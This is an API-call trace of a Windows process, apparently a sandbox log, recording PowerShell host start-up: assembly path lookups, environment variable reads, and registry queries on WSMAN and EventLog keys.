	[0164.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0164.153] GetLastError () returned 0x57
	[0164.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0164.153] GetLastError () returned 0x57
	[0164.156] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x10e2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0164.156] GetLastError () returned 0x57
	[0164.156] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x10e2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0164.156] GetLastError () returned 0x57
	[0164.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0164.158] GetLastError () returned 0x57
	[0164.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0164.159] GetLastError () returned 0x57
	[0164.160] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x10e2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0164.161] GetLastError () returned 0x57
	[0164.161] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x10e2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0164.161] GetLastError () returned 0x57
	[0164.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x10e2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0164.162] GetLastError () returned 0x57
	[0164.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x10e2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0164.162] GetLastError () returned 0x57
	[0164.178] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0164.178] GetLastError () returned 0xcb
	[0164.183] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0164.183] GetLastError () returned 0xcb
	[0164.394] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0164.394] GetLastError () returned 0xcb
	[0164.580] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e68c | out: phkResult=0x10e68c*=0x348) returned 0x0
	[0164.583] RegQueryInfoKeyW (in: hKey=0x348, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x10e6dc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10e6e0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x10e6dc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10e6e0*=0x2, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0164.585] RegEnumValueW (in: hKey=0x348, dwIndex=0x0, lpValueName=0x584bc0, lpcchValueName=0x10e704, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x10e704, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0164.585] RegEnumValueW (in: hKey=0x348, dwIndex=0x1, lpValueName=0x584bc0, lpcchValueName=0x10e704, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x10e704, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0164.585] RegQueryValueExW (in: hKey=0x348, lpValueName="StackVersion", lpReserved=0x0, lpType=0x10e6e4, lpData=0x0, lpcbData=0x10e6e0*=0x0 | out: lpType=0x10e6e4*=0x1, lpData=0x0, lpcbData=0x10e6e0*=0x8) returned 0x0
	[0164.585] RegQueryValueExW (in: hKey=0x348, lpValueName="StackVersion", lpReserved=0x0, lpType=0x10e6e4, lpData=0x584bc0, lpcbData=0x10e6e0*=0x8 | out: lpType=0x10e6e4*=0x1, lpData="2.0", lpcbData=0x10e6e0*=0x8) returned 0x0
	[0165.248] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e648 | out: phkResult=0x10e648*=0x31c) returned 0x0
	[0165.248] RegQueryInfoKeyW (in: hKey=0x31c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x10e698, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10e69c, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x10e698*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10e69c*=0x2, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0165.248] RegEnumValueW (in: hKey=0x31c, dwIndex=0x0, lpValueName=0x584bc0, lpcchValueName=0x10e6c0, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x10e6c0, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0165.248] RegEnumValueW (in: hKey=0x31c, dwIndex=0x1, lpValueName=0x584bc0, lpcchValueName=0x10e6c0, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x10e6c0, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0165.249] RegQueryValueExW (in: hKey=0x31c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x10e6a0, lpData=0x0, lpcbData=0x10e69c*=0x0 | out: lpType=0x10e6a0*=0x1, lpData=0x0, lpcbData=0x10e69c*=0x8) returned 0x0
	[0165.249] RegQueryValueExW (in: hKey=0x31c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x10e6a0, lpData=0x584bc0, lpcbData=0x10e69c*=0x8 | out: lpType=0x10e6a0*=0x1, lpData="2.0", lpcbData=0x10e69c*=0x8) returned 0x0
	[0165.250] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0165.250] GetLastError () returned 0xcb
	[0165.257] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0165.257] GetLastError () returned 0xcb
	[0166.041] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e608 | out: phkResult=0x10e608*=0x320) returned 0x0
	[0166.041] RegQueryInfoKeyW (in: hKey=0x320, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x10e670, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10e66c, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x10e670*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10e66c*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0166.042] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x0, lpName=0x584bc0, lpcchName=0x10e68c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x10e68c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0166.043] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x1, lpName=0x584bc0, lpcchName=0x10e68c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x10e68c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0166.043] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x2, lpName=0x584bc0, lpcchName=0x10e68c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x10e68c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0166.043] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x3, lpName=0x584bc0, lpcchName=0x10e68c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x10e68c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0166.043] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x4, lpName=0x584bc0, lpcchName=0x10e68c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x10e68c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0166.043] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x5, lpName=0x584bc0, lpcchName=0x10e68c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x10e68c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0166.044] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x6, lpName=0x584bc0, lpcchName=0x10e68c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x10e68c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0166.044] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x7, lpName=0x584bc0, lpcchName=0x10e68c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x10e68c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0166.044] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x8, lpName=0x584bc0, lpcchName=0x10e68c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x10e68c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0166.044] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e638 | out: phkResult=0x10e638*=0x324) returned 0x0
	[0166.045] RegOpenKeyExW (in: hKey=0x324, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e638 | out: phkResult=0x10e638*=0x0) returned 0x2
	[0166.045] RegOpenKeyExW (in: hKey=0x320, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e638 | out: phkResult=0x10e638*=0x1e8) returned 0x0
	[0166.045] RegOpenKeyExW (in: hKey=0x1e8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e638 | out: phkResult=0x10e638*=0x0) returned 0x2
	[0166.045] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e638 | out: phkResult=0x10e638*=0x2fc) returned 0x0
	[0166.045] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e638 | out: phkResult=0x10e638*=0x0) returned 0x2
	[0166.046] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e638 | out: phkResult=0x10e638*=0x34c) returned 0x0
	[0166.046] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e638 | out: phkResult=0x10e638*=0x0) returned 0x2
	[0166.046] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e638 | out: phkResult=0x10e638*=0x350) returned 0x0
	[0166.046] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e638 | out: phkResult=0x10e638*=0x0) returned 0x2
	[0166.046] RegOpenKeyExW (in: hKey=0x320, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e638 | out: phkResult=0x10e638*=0x354) returned 0x0
	[0166.047] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e638 | out: phkResult=0x10e638*=0x0) returned 0x2
	[0166.047] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e638 | out: phkResult=0x10e638*=0x358) returned 0x0
	[0166.047] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e638 | out: phkResult=0x10e638*=0x0) returned 0x2
	[0166.047] RegOpenKeyExW (in: hKey=0x320, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e638 | out: phkResult=0x10e638*=0x35c) returned 0x0
	[0166.048] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e638 | out: phkResult=0x10e638*=0x0) returned 0x2
	[0166.048] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e638 | out: phkResult=0x10e638*=0x360) returned 0x0
	[0166.048] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e638 | out: phkResult=0x10e638*=0x364) returned 0x0
	[0166.048] RegCloseKey (hKey=0x364) returned 0x0
	[0166.049] RegCloseKey (hKey=0x320) returned 0x0
	[0166.050] RegCloseKey (hKey=0x360) returned 0x0
	[0166.579] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x5f1fc0, nSize=0x10e784 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x10e784) returned 0x1
	[0166.580] GetLastError () returned 0x3
	[0166.581] GetUserNameW (in: lpBuffer=0x584bc0, pcbBuffer=0x10e78c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x10e78c) returned 1
	[0167.847] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e5ec | out: phkResult=0x10e5ec*=0x320) returned 0x0
	[0167.847] RegQueryInfoKeyW (in: hKey=0x320, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x10e654, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10e650, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x10e654*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10e650*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.847] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x0, lpName=0x584bc0, lpcchName=0x10e670, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x10e670, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.847] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x1, lpName=0x584bc0, lpcchName=0x10e670, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x10e670, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.848] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x2, lpName=0x584bc0, lpcchName=0x10e670, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x10e670, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.848] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x3, lpName=0x584bc0, lpcchName=0x10e670, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x10e670, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.848] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x4, lpName=0x584bc0, lpcchName=0x10e670, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x10e670, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.848] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x5, lpName=0x584bc0, lpcchName=0x10e670, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x10e670, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.848] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x6, lpName=0x584bc0, lpcchName=0x10e670, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x10e670, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.849] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x7, lpName=0x584bc0, lpcchName=0x10e670, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x10e670, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.849] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x8, lpName=0x584bc0, lpcchName=0x10e670, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x10e670, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.849] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e61c | out: phkResult=0x10e61c*=0x364) returned 0x0
	[0167.849] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e61c | out: phkResult=0x10e61c*=0x0) returned 0x2
	[0167.849] RegOpenKeyExW (in: hKey=0x320, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e61c | out: phkResult=0x10e61c*=0x368) returned 0x0
	[0167.849] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e61c | out: phkResult=0x10e61c*=0x0) returned 0x2
	[0167.850] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e61c | out: phkResult=0x10e61c*=0x36c) returned 0x0
	[0167.850] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e61c | out: phkResult=0x10e61c*=0x0) returned 0x2
	[0167.850] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e61c | out: phkResult=0x10e61c*=0x370) returned 0x0
	[0167.850] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e61c | out: phkResult=0x10e61c*=0x0) returned 0x2
	[0167.850] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e61c | out: phkResult=0x10e61c*=0x374) returned 0x0
	[0167.851] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e61c | out: phkResult=0x10e61c*=0x0) returned 0x2
	[0167.851] RegOpenKeyExW (in: hKey=0x320, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e61c | out: phkResult=0x10e61c*=0x378) returned 0x0
	[0167.851] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e61c | out: phkResult=0x10e61c*=0x0) returned 0x2
	[0167.851] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e61c | out: phkResult=0x10e61c*=0x37c) returned 0x0
	[0167.851] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e61c | out: phkResult=0x10e61c*=0x0) returned 0x2
	[0167.851] RegOpenKeyExW (in: hKey=0x320, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e61c | out: phkResult=0x10e61c*=0x380) returned 0x0
	[0167.852] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e61c | out: phkResult=0x10e61c*=0x0) returned 0x2
	[0167.852] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e61c | out: phkResult=0x10e61c*=0x384) returned 0x0
	[0167.852] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e61c | out: phkResult=0x10e61c*=0x388) returned 0x0
	[0167.852] RegCloseKey (hKey=0x388) returned 0x0
	[0167.852] RegCloseKey (hKey=0x320) returned 0x0
	[0167.852] RegCloseKey (hKey=0x384) returned 0x0
	[0167.853] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e5ec | out: phkResult=0x10e5ec*=0x384) returned 0x0
	[0167.853] RegQueryInfoKeyW (in: hKey=0x384, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x10e654, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10e650, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x10e654*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10e650*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.853] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x0, lpName=0x584bc0, lpcchName=0x10e670, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x10e670, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.853] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x1, lpName=0x584bc0, lpcchName=0x10e670, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x10e670, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.853] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x2, lpName=0x584bc0, lpcchName=0x10e670, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x10e670, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.853] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x3, lpName=0x584bc0, lpcchName=0x10e670, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x10e670, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.854] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x4, lpName=0x584bc0, lpcchName=0x10e670, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x10e670, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
